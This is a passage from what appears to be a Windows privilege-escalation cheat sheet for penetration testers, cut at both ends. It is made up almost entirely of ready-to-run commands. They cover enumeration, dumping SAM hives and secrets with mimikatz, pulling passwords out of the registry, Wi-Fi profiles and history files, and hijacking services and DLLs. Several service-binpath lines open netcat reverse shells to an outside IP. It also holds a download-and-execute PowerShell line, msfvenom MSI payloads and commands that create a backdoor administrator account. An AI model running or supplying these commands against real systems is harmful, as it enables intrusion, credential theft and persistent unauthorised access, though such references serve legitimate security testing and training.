- Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) - ```powershell - powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt - ``` -- [winPEAS - Windows Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) -- [Windows Exploit Suggester - Next Generation (WES-NG)](https://github.com/bitsadmin/wesng) - ```powershell - # First obtain systeminfo - systeminfo - systeminfo > systeminfo.txt - # Then feed it to wesng - python3 wes.py --update-wes - python3 wes.py --update - python3 wes.py systeminfo.txt - ``` -- [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck) - ```powershell - C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" - C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" - C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML" - ``` - -## Windows Version and Configuration - -```powershell -systeminfo | findstr /B /C:"OS Name" /C:"OS Version" -``` - -Extract patchs and updates -```powershell -wmic qfe -``` - -Architecture - -```powershell -wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% -``` - -List all env variables - -```powershell -set -Get-ChildItem Env: | ft Key,Value -``` - -List all drives - -```powershell -wmic logicaldisk get caption || fsutil fsinfo drives -wmic logicaldisk get caption,description,providername -Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root -``` - -## User Enumeration - -Get current username - -```powershell -echo %USERNAME% || whoami -$env:username -``` - -List user privilege - -```powershell -whoami /priv -whoami /groups -``` - -List all users - -```powershell -net user -whoami /all -Get-LocalUser | ft Name,Enabled,LastLogon -Get-ChildItem C:\Users -Force | select Name -``` - -List logon requirements; useable for bruteforcing - -```powershell$env:usernadsc -net accounts -``` - -Get details about a user (i.e. administrator, admin, current user) - -```powershell -net user administrator -net user admin -net user %USERNAME% -``` - -List all local groups - -```powershell -net localgroup -Get-LocalGroup | ft Name -``` - -Get details about a group (i.e. administrators) - -```powershell -net localgroup administrators -Get-LocalGroupMember Administrators | ft Name, PrincipalSource -Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource -``` - -Get Domain Controllers - -```powershell -nltest /DCLIST:DomainName -nltest /DCNAME:DomainName -nltest /DSGETDC:DomainName -``` - -## Network Enumeration - -List all network interfaces, IP, and DNS. - -```powershell -ipconfig /all -Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address -Get-DnsClientServerAddress -AddressFamily IPv4 | ft -``` - -List current routing table - -```powershell -route print -Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex -``` - -List the ARP table - -```powershell -arp -A -Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State -``` - -List all current connections - -```powershell -netstat -ano -``` - -List all network shares - -```powershell -net share -powershell Find-DomainShare -ComputerDomain domain.local -``` - -SNMP Configuration - -```powershell -reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s -Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse -``` - -## Antivirus Enumeration - -Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` - - -## Default Writeable Folders - -```powershell -C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys -C:\Windows\System32\spool\drivers\color -C:\Windows\System32\spool\printers -C:\Windows\System32\spool\servers -C:\Windows\tracing -C:\Windows\Temp -C:\Users\Public -C:\Windows\Tasks -C:\Windows\System32\tasks -C:\Windows\SysWOW64\tasks -C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system -C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system -C:\Windows\debug\wia -C:\Windows\registration\crmlog -C:\Windows\System32\com\dmp -C:\Windows\SysWOW64\com\dmp -C:\Windows\System32\fxstmp -C:\Windows\SysWOW64\fxstmp -``` - -## EoP - Looting for passwords - -### SAM and SYSTEM files - -The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM. - -```powershell -# Usually %SYSTEMROOT% = C:\Windows -%SYSTEMROOT%\repair\SAM -%SYSTEMROOT%\System32\config\RegBack\SAM -%SYSTEMROOT%\System32\config\SAM -%SYSTEMROOT%\repair\system -%SYSTEMROOT%\System32\config\SYSTEM -%SYSTEMROOT%\System32\config\RegBack\system -``` - -Generate a hash file for John using `pwdump` or `samdump2`. - -```powershell -pwdump SYSTEM SAM > /root/sam.txt -samdump2 SYSTEM SAM -o sam.txt -``` - -Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash. - - -### HiveNightmare - -> CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user - -Check for the vulnerability using `icacls` - -```powershell -C:\Windows\System32> icacls config\SAM -config\SAM BUILTIN\Administrators:(I)(F) - NT AUTHORITY\SYSTEM:(I)(F) - BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access! -``` - -Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it. - -```powershell -mimikatz> token::whoami /full - -# List shadow copies available -mimikatz> misc::shadowcopies - -# Extract account from SAM databases -mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM - -# Extract secrets from SECURITY -mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY -``` - -### LAPS Settings - -Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. - -* LAPS Enabled: AdmPwdEnabled -* LAPS Admin Account Name: AdminAccountName -* LAPS Password Complexity: PasswordComplexity -* LAPS Password Length: PasswordLength -* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled - - -### Search for file contents - -```powershell -cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt -findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt -findstr /spin "password" *.* -``` - -Also search in remote places such as SMB Shares and SharePoint: - -* Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint) (must be compiled first, for referencing issue see: https://github.com/nheiniger/SnaffPoint/pull/6) - -```powershell -# First, retrieve a token -## Method 1: using SnaffPoint binary -$token = (.\GetBearerToken.exe https://your.sharepoint.com) -## Method 2: using AADInternals -Install-Module AADInternals -Scope CurrentUser -Import-Module AADInternals -$token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com") - -# Second, search on Sharepoint -## Method 1: using search strings in ./presets dir -.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -## Method 2: using search string in command line -### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference -.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config" -``` - -* Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) - -### Search for a file with a certain filename - -```powershell -dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* -where /R C:\ user.txt -where /R C:\ *.ini -``` - -### Search the registry for key names and passwords - -```powershell -REG QUERY HKLM /F "password" /t REG_SZ /S /K -REG QUERY HKCU /F "password" /t REG_SZ /S /K - -reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin -reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" -reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters -reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials -reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials -reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password - -reg query HKLM /f password /t REG_SZ /s -reg query HKCU /f password /t REG_SZ /s -``` - -### Passwords in unattend.xml - -Location of the unattend.xml files. - -```powershell -C:\unattend.xml -C:\Windows\Panther\Unattend.xml -C:\Windows\Panther\Unattend\Unattend.xml -C:\Windows\system32\sysprep.inf -C:\Windows\system32\sysprep\sysprep.xml -``` - -Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`. - -Example content - -```powershell - - - U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo== - true - Administrateur - - - - - - *SENSITIVE*DATA*DELETED* - administrators;users - Administrateur - - - -``` - -Unattend credentials are stored in base64 and can be decoded manually with base64. - -```powershell -$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d -SecretSecurePassword1234* -``` - -The Metasploit module `post/windows/gather/enum_unattend` looks for these files. - -### IIS Web config - -```powershell -Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue -``` - -```powershell -C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config -C:\inetpub\wwwroot\web.config -``` - -### Other files - -```bat -%SYSTEMDRIVE%\pagefile.sys -%WINDIR%\debug\NetSetup.log -%WINDIR%\repair\sam -%WINDIR%\repair\system -%WINDIR%\repair\software, %WINDIR%\repair\security -%WINDIR%\iis6.log -%WINDIR%\system32\config\AppEvent.Evt -%WINDIR%\system32\config\SecEvent.Evt -%WINDIR%\system32\config\default.sav -%WINDIR%\system32\config\security.sav -%WINDIR%\system32\config\software.sav -%WINDIR%\system32\config\system.sav -%WINDIR%\system32\CCM\logs\*.log -%USERPROFILE%\ntuser.dat -%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat -%WINDIR%\System32\drivers\etc\hosts -C:\ProgramData\Configs\* -C:\Program Files\Windows PowerShell\* -dir c:*vnc.ini /s /b -dir c:*ultravnc.ini /s /b -``` - -### Wifi passwords - -Find AP SSID -```bat -netsh wlan show profile -``` - -Get Cleartext Pass -```bat -netsh wlan show profile key=clear -``` - -Oneliner method to extract wifi passwords from all the access point. - -```batch -cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on -``` - -### Sticky Notes passwords - -The sticky notes app stores it's content in a sqlite db located at `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` - -### Passwords stored in services - -Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher) - - -```powershell -https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 -Import-Module path\to\SessionGopher.ps1; -Invoke-SessionGopher -AllDomain -o -Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss -``` - - -### Passwords stored in Key Manager - -:warning: This software will display its output in a GUI - -```ps1 -rundll32 keymgr,KRShowKeyMgr -``` - -### Powershell History - -Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`. - -```powershell -type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt -type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt -type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -cat (Get-PSReadlineOption).HistorySavePath -cat (Get-PSReadlineOption).HistorySavePath | sls passw -``` - -### Powershell Transcript - -```xml -C:\Users\\Documents\PowerShell_transcript....txt -C:\Transcripts\\PowerShell_transcript....txt -``` - -### Password in Alternate Data Stream - -```ps1 -PS > Get-Item -path flag.txt -Stream * -PS > Get-Content -path flag.txt -Stream Flag -``` - -## EoP - Processes Enumeration and Tasks - -* What processes are running? - ```powershell - tasklist /v - net start - sc query - Get-Service - Get-Process - Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize - ``` - -* Which processes are running as "system" - ```powershell - tasklist /v /fi "username eq system" - ``` - -* Do you have powershell magic? - ```powershell - REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion - ``` - -* List installed programs - ```powershell - Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime - Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name - ``` - -* List services - ```powershell - net start - wmic service list brief - tasklist /SVC - ``` - -* Enumerate scheduled tasks - ```powershell - schtasks /query /fo LIST 2>nul | findstr TaskName - schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM - Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State - ``` - -* Startup tasks - ```powershell - wmic startup get caption,command - reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R - reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run - reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce - dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" - dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" - ``` - -## EoP - Incorrect permissions in services - -> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system. - -Often, services are pointing to writeable locations: -- Orphaned installs, not installed anymore but still exist in startup -- DLL Hijacking - ```powershell - # find missing DLL - - Find-PathDLLHijack PowerUp.ps1 - - Process Monitor : check for "Name Not Found" - - # compile a malicious dll - - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll" - - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll" - - # content of windows_dll.c - #include - BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { - if (dwReason == DLL_PROCESS_ATTACH) { - system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); - ExitProcess(0); - } - return TRUE; - } - ``` - -- PATH directories with weak permissions - ```powershell - $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt - $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" - - $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt - FOR /F %i in (Servicenames.txt) DO echo %i - type Servicenames.txt - FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt - FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt - ``` - -Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions` - -Note to check file permissions you can use `cacls` and `icacls` -> icacls (Windows Vista +) -> cacls (Windows XP) - -You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output. - -### Example with Windows 10 - CVE-2019-1322 UsoSvc - -Prerequisite: Service account - -```powershell -PS C:\Windows\system32> sc.exe stop UsoSvc -PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" -PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" -PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" -PS C:\Windows\system32> sc.exe qc usosvc -[SC] QueryServiceConfig SUCCESS - -SERVICE_NAME: usosvc - TYPE : 20 WIN32_SHARE_PROCESS - START_TYPE : 2 AUTO_START (DELAYED) - ERROR_CONTROL : 1 NORMAL - BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe - LOAD_ORDER_GROUP : - TAG : 0 - DISPLAY_NAME : Update Orchestrator Service - DEPENDENCIES : rpcss - SERVICE_START_NAME : LocalSystem - -PS C:\Windows\system32> sc.exe start UsoSvc -``` - -### Example with Windows XP SP1 - upnphost - -```powershell -# NOTE: spaces are mandatory for this exploit to work ! -sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe" -sc config upnphost obj= ".\LocalSystem" password= "" -sc qc upnphost -sc config upnphost depend= "" -net start upnphost -``` - -If it fails because of a missing dependency, try the following commands. - -```powershell -sc config SSDPSRV start=auto -net start SSDPSRV -net stop upnphost -net start upnphost - -sc config upnphost depend="" -``` - -Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe) - -```powershell -$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula -RW SSDPSRV - SERVICE_ALL_ACCESS -RW upnphost - SERVICE_ALL_ACCESS - -$ accesschk.exe -ucqv upnphost -upnphost - RW NT AUTHORITY\SYSTEM - SERVICE_ALL_ACCESS - RW BUILTIN\Administrators - SERVICE_ALL_ACCESS - RW NT AUTHORITY\Authenticated Users - SERVICE_ALL_ACCESS - RW BUILTIN\Power Users - SERVICE_ALL_ACCESS - -$ sc config binpath="net user backdoor backdoor123 /add" -$ sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" -$ sc stop -$ sc start -$ sc config binpath="net localgroup Administrators backdoor /add" -$ sc stop -$ sc start -``` - -## EoP - Windows Subsystem for Linux (WSL) - -Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) - -> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse. - -```powershell -wsl whoami -./ubuntun1604.exe config --default-user root -wsl whoami -wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' -``` - -Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` - -Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` - -## EoP - Unquoted Service Paths - -The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. - -```powershell -wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ - -wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ - -gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name -``` - -* Metasploit exploit : `exploit/windows/local/trusted_service_path` -* PowerUp exploit - ```powershell - # find the vulnerable application - C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" - - ... - [*] Checking for unquoted service paths... - ServiceName : BBSvc - Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe - StartName : LocalSystem - AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path - ... - - # automatic exploit - Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe" - ``` - -### Example - -For `C:\Program Files\something\legit.exe`, Windows will try the following paths first: -- `C:\Program.exe` -- `C:\Program Files.exe` - - -## EoP - $PATH Interception - -Requirements: -- PATH contains a writeable folder with low privileges. -- The writeable folder is _before_ the folder that contains the legitimate binary. - -EXAMPLE: -```powershell -# List contents of the PATH environment variable -# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 -$env:Path - -# See permissions of the target folder -# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW -icacls.exe "C:\Program Files\nodejs\" - -# Place our evil-file in that folder. -copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" -``` - -Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. - - -## EoP - Named Pipes - -1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` -2. Check named pipes DACL: `pipesec.exe ` -3. Reverse engineering software -4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe` - - -## EoP - Kernel Exploitation - -List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) - -##### #Security Bulletin   #KB     #Description    #Operating System -- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8) -- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008) -- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008) -- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2) -- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1) -- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP) -- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016) -- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1) -- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1) -- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012) -- [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012) -- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012) -- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7) -- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7) -... -- [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) - -To cross compile a program from Kali, use the following command. - -```powershell -Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c -``` - -## EoP - AlwaysInstallElevated - -Check if these registry values are set to "1". - -```powershell -$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated -$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated - -$ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer -$ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer -``` - -Then create an MSI package and install it. - -```powershell -$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi -$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi -$ msiexec /quiet /qn /i C:\evil.msi -``` - -Technique also available in : -* Metasploit : `exploit/windows/local/always_install_elevated` -* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI` - - -## EoP - Insecure GUI apps - -Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. - -Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" - -## EoP - Evaluating Vulnerable Drivers -Look for vuln drivers loaded, we often don't spend enough time looking at this: - -```powershell -# Native binary -PS C:\Users\Swissky> driverquery.exe /fo table /si -Module Name Display Name Driver Type Link Date -============ ====================== ============= ====================== -1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM -3ware 3ware Kernel 5/18/2015 6:28:03 PM -ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM -AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM -acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM -acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM -AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM -acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM -ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM - - -# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery -PS C:\Users\Swissky> DriverQuery.exe --no-msft -[+] Enumerating driver services... -[+] Checking file signatures... -Citrix USB Filter Driver - Service Name: ctxusbm - Path: C:\Windows\system32\DRIVERS\ctxusbm.sys - Version: 14.11.0.138 - Creation Time (UTC): 17/05/2018 01:20:50 - Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US - Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US - -``` - -## EoP - Printers - -### Universal Printer - -Create a Printer - -```ps1 -$printerName = 'Universal Priv Printer' -$system32 = $env:systemroot + '\system32' -$drivers = $system32 + '\spool\drivers' -$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName - -Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll') -Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll') -Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll') - -Add-PrinterDriver -Name 'Generic / Text Only' -Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared - -New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null -New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null -New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null -New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null -New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null -``` - -Execute the driver - -```ps1 -$serverName = 'dc.purple.lab' -$printerName = 'Universal Priv Printer' -$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) -Remove-Printer -Name 